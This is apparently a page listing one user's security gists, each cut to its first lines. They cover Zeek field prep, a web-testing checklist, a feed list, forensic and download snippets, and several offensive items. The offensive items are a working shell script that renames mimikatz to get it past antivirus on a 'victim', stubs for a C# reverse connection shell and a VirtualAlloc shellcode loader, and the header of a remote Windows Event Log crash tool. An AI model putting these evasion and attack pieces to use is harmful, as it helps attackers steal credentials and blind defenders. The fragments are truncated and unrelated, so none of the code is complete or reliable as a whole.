jessefmoore

Understanding of Zeek Fields

use the following OSSEM branch

Prep Elasticsearch

You only need to do this one time skip this section if you have done this once already and go to the "Upload data section"

Login/browse to your Kibana instance Go to Dev Tools (which is the wrench icon in the bottom left)

jessefmoore

# This script downloads and slightly "obfuscates" the mimikatz project.
# Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "benjamin@gentilkiwi.com" ..., 
# so removing them from the project before compiling gets us past most of the AV solutions.
# We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ....,
# but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program.

git clone https://github.com/gentilkiwi/mimikatz.git windows
mv windows/mimikatz windows/candycrush
find windows/ -type f -print0 | xargs -0 sed -i 's/mimikatz/candycrush/g'
find windows/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/CANDYCRUSH/g'

jessefmoore

The Web Application Hacker's Handbook

Web Application Hacker's Handbook Task checklist as a Github-Flavored Markdown file

Contents

• Recon and analysis
• Test handling of access
• Test handling of input
• Test application logic
• Assess application hosting
• Miscellaneous tests

jessefmoore

using System;
using System.IO;
using System.Runtime.InteropServices;

namespace UnmanagedCode
{
	class Program
	{
		[DllImport("kernel32")]
		static extern IntPtr VirtualAlloc(IntPtr ptr, IntPtr size, IntPtr type, IntPtr mode);

jessefmoore

/*
Reference: http://www.codeproject.com/Articles/20250/Reverse-Connection-Shell
*/

using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Linq;

jessefmoore

# Crash the Windows Event Log Service remotely, needs Admin privs
# originally discovered by limbenjamin and accidently re-discovered by @byt3bl33d3r
#
# Once the service crashes 3 times it will not restart for 24 hours
#
# https://github.com/limbenjamin/LogServiceCrash
# https://limbenjamin.com/articles/crash-windows-event-logging-service.html
#
# Needs the impacket library (https://github.com/SecureAuthCorp/impacket)

jessefmoore

<?xml version="1.0" encoding="UTF-8"?>

<opml version="1.0">
    <head>
        <title>Olaf subscriptions in feedly Cloud</title>
    </head>
    <body>
        <outline text="PublicFeeds" title="PublicFeeds">
            <outline type="rss" text="top scoring links : netsec" title="top scoring links : netsec" xmlUrl="http://www.reddit.com/r/netsec/top/.rss" htmlUrl="https://www.reddit.com/r/netsec/top/"/>
            <outline type="rss" text="For [Blue|Purple] Teams in Cyber Defence" title="For [Blue|Purple] Teams in Cyber Defence" xmlUrl="https://www.reddit.com/r/blueteamsec.rss" htmlUrl="https://www.reddit.com/r/blueteamsec"/>

jessefmoore

##################################################
## PyDefenderCheck - Python implementation of DefenderCheck
##################################################
## Author: daddycocoaman
## Based on: https://github.com/matterpreter/DefenderCheck
##################################################


import argparse
import enum

jessefmoore

LOCATION=$(curl -s https://api.github.com/repos/<YOUR ORGANIZTION>/<YOUR REPO>/releases/latest \
| grep "tag_name" \
| awk '{print "https://github.com/<YOUR ORGANIZATION>/<YOUR REPO>/archive/" substr($2, 2, length($2)-3) ".zip"}') \
; curl -L -o <OUTPUT FILE NAME> $LOCATION

for example:

LOCATION=$(curl -s https://api.github.com/repos/byt3bl33d3r/CrackMapExec/releases \
| grep "tag_name" \

jessefmoore

import json
import sqlite3
import olefile
import argparse

def parse_snt_file(file):
    # https://www.tutorialspoint.com/python_digital_forensics/python_digital_forensics_important_artifacts_in_windows
    if not olefile.isOleFile(file):
        return "Invalid OLE file"